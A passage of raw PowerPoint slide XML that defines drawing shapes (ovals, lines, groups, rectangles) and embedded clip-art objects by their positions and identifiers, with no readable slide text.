                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745922D0-E182-0C43-81DE-336289EB3A88}"/>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7" name="Oval 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D379780E-4428-BE40-8C03-B7943FA25F0B}"/>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28" name="Line 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF72F2E1-8021-A041-9489-50D1EF84968C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9136683" y="3197510"/>
            <a:ext cx="49530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9" name="Line 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93FB305-6990-B843-A279-688AE105FEE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9139859" y="3194335"/>
            <a:ext cx="1587" cy="95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0" name="Line 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB99759-BF1D-694A-9AB0-8632C38E822B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9635159" y="3192748"/>
            <a:ext cx="1587" cy="82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1" name="Line 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD61A1B-3249-8742-8D48-99958198E424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8836646" y="2657761"/>
            <a:ext cx="288925" cy="265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2" name="Line 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42335928-D031-F14E-86BD-BBC541007D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8849346" y="2943510"/>
            <a:ext cx="276225"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3" name="Line 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A284F770-C272-9640-B54F-1D8B27639B9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9376395" y="3029236"/>
            <a:ext cx="1588" cy="1635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34" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC864F5B-E0F8-9F41-9706-83EFB4C4FB11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9495458" y="3267360"/>
            <a:ext cx="209550" cy="395288"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="848935" name="AutoShape 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B925CB0-734D-4F40-A7D8-E9781D7F0D1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6" name="Rectangle 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A4076C-3D4E-EE4B-8D4A-86CE99D5C9F6}"/>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7" name="Rectangle 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541E4FEA-A68B-2242-82FE-16CB587E281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8" name="AutoShape 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A78E728-34B3-EC4F-A571-30F8134764B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9" name="Line 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C38B6A-0192-A145-BA0B-9912CA48A7C4}"/>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0" name="Line 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2349E58B-257C-6746-8C02-F3F6DA4B4549}"/>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1" name="Rectangle 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF13E36-D9F7-2A43-9700-FCF45A934980}"/>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2" name="Rectangle 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D7C1BAE-D082-9146-B255-DE7B406C6812}"/>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43" name="Group 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA5ED72-FB54-3945-A565-188EBE499FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8538196" y="3886486"/>
            <a:ext cx="479425" cy="925513"/>
            <a:chOff x="3314" y="1248"/>
            <a:chExt cx="344" cy="694"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="848944" name="Object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A033EAA-FF05-D04E-A664-ECEE26EC3034}"/>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43265" name="Clip" r:id="rId11" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId11" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848944" name="Object 48">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A033EAA-FF05-D04E-A664-ECEE26EC30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45" name="Line 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{036EA005-3640-DA48-AF43-224C5A98BF7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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48946" name="Object 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A594A9-CB87-9D46-BBDF-F6A68121EC73}"/>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43266" name="Clip" r:id="rId12" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId12" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848946" name="Object 50">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A594A9-CB87-9D46-BBDF-F6A68121EC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47" name="Line 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B571BA75-A76B-1B48-B183-6B7F6F69F545}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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48" name="Group 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BC1757C-1F30-1749-ACD7-37C82970E3F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3404" y="1504"/>
              <a:ext cx="51" cy="167"/>
              <a:chOff x="3842" y="406"/>
              <a:chExt cx="51" cy="167"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="848949" name="Oval 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7909636-1D3C-D846-A65F-BC88C27BE89A}"/>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0" name="Oval 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3169E1AE-2998-B943-ACF4-638735942D0B}"/>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1" name="Oval 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8B12E0-B6F4-1546-ADB5-372E5FC7A146}"/>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52" name="Line 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2719ED7-8F5A-C64F-B438-BD5A5EDCFD99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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848954" name="Object 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5F80A9-BE43-A446-893B-BE79B33795CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165597090"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8792196" y="4885023"/>
          <a:ext cx="415925" cy="330200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s43267" name="Clip" r:id="rId13" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId13" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="848954" name="Object 58">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5F80A9-BE43-A446-893B-BE79B3379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2196" y="4885023"/>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55" name="Oval 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98427302-87CC-9C48-B568-94A99F0EBF07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="9208914" y="4989004"/>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6" name="Oval 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90FFB596-EE69-DA48-8FAA-86CDF91B558E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="9293846" y="4986623"/>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7" name="Oval 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DF2085C-BB8F-6E44-8017-B3CED927013C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="9371633" y="4991385"/>
            <a:ext cx="61912"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8" name="Line 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85159C9C-4330-434B-B824-5BC48B222B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="9631190" y="4871530"/>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9" name="Line 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A53A131F-6565-F442-9067-5151572A51C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="9004920" y="4862798"/>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0" name="Line 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2254633-5527-B14E-AE02-527A4233EF97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="9351789" y="4523867"/>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1" name="Line 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A353E5E7-C408-9E48-BE68-C080DDE4F60D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9017621" y="4462749"/>
            <a:ext cx="93663"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2" name="Line 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80B5EB34-CB0C-BF46-91CA-1DBA938B4B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9619283" y="4508786"/>
            <a:ext cx="303212" cy="385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3" name="Line 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD06513-F9F6-6843-BE5D-7694F436C30F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="10414620" y="4505611"/>
            <a:ext cx="279400" cy="392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48964" name="Object 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE8B4FEC-7F9B-034D-B928-E3DC26AD1627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1386248943"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10592420" y="4057935"/>
          <a:ext cx="203200" cy="241300"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s43268" name="Clip" r:id="rId14" imgW="13271500" imgH="16306800" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId14" imgW="13271500" imgH="16306800" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="848964" name="Object 68">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE8B4FEC-7F9B-034D-B928-E3DC26AD162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92420" y="4057935"/>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65" name="Object 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64E0B54D-BEDE-6247-9F88-146BFDF822E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2738175086"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9255745" y="4138898"/>
          <a:ext cx="203200" cy="239712"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s43269" name="Clip" r:id="rId16" imgW="13271500" imgH="16306800" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId16" imgW="13271500" imgH="16306800" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="848965" name="Object 69">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64E0B54D-BEDE-6247-9F88-146BFDF822E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55745" y="4138898"/>
                        <a:ext cx="2032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8966" name="Group 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F830D95E-C66F-FF42-9DA8-E1C4E2AB9A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9603408" y="5335874"/>
            <a:ext cx="406400" cy="427037"/>
            <a:chOff x="2870" y="1518"/>
            <a:chExt cx="292" cy="320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="848967" name="Object 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61227D9B-7DA5-BD49-B73B-EB795CD45D0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3270" name="Clip" r:id="rId17" imgW="11137900" imgH="11315700" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId17" imgW="11137900" imgH="11315700" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848967" name="Object 71">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61227D9B-7DA5-BD49-B73B-EB795CD45D0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68" name="Object 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB3D1CD6-9626-784B-8BDD-929712E681C9}"/>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3271" name="Clip" r:id="rId19" imgW="17005300" imgH="16078200" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId19" imgW="17005300" imgH="16078200" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848968" name="Object 72">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB3D1CD6-9626-784B-8BDD-929712E681C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8969" name="Group 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE468BAB-23A7-9A44-B9EF-D9DAA09F31AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10381283" y="5367624"/>
            <a:ext cx="406400" cy="427037"/>
            <a:chOff x="2870" y="1518"/>
            <a:chExt cx="292" cy="320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="848970" name="Object 74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{526D74B2-EEEB-0349-BBC5-EA28D381AF85}"/>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3272" name="Clip" r:id="rId21" imgW="11137900" imgH="11315700" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId21" imgW="11137900" imgH="11315700" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848970" name="Object 74">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{526D74B2-EEEB-0349-BBC5-EA28D381AF8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71" name="Object 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2B84920-8575-734A-AB72-9C4E2EF9B4F2}"/>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3273" name="Clip" r:id="rId22" imgW="17005300" imgH="16078200" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId22" imgW="17005300" imgH="16078200" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848971" name="Object 75">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2B84920-8575-734A-AB72-9C4E2EF9B4F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8972" name="Group 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0034B605-823A-0C46-96D0-0A842C10F7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9966946" y="5083460"/>
            <a:ext cx="379413" cy="376238"/>
            <a:chOff x="4733" y="2082"/>
            <a:chExt cx="272" cy="282"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="848973" name="Object 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{306F926E-E5F3-5C44-87FA-24677974F932}"/>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43274" name="Clip" r:id="rId23" imgW="11137900" imgH="11315700" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId23" imgW="11137900" imgH="11315700" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
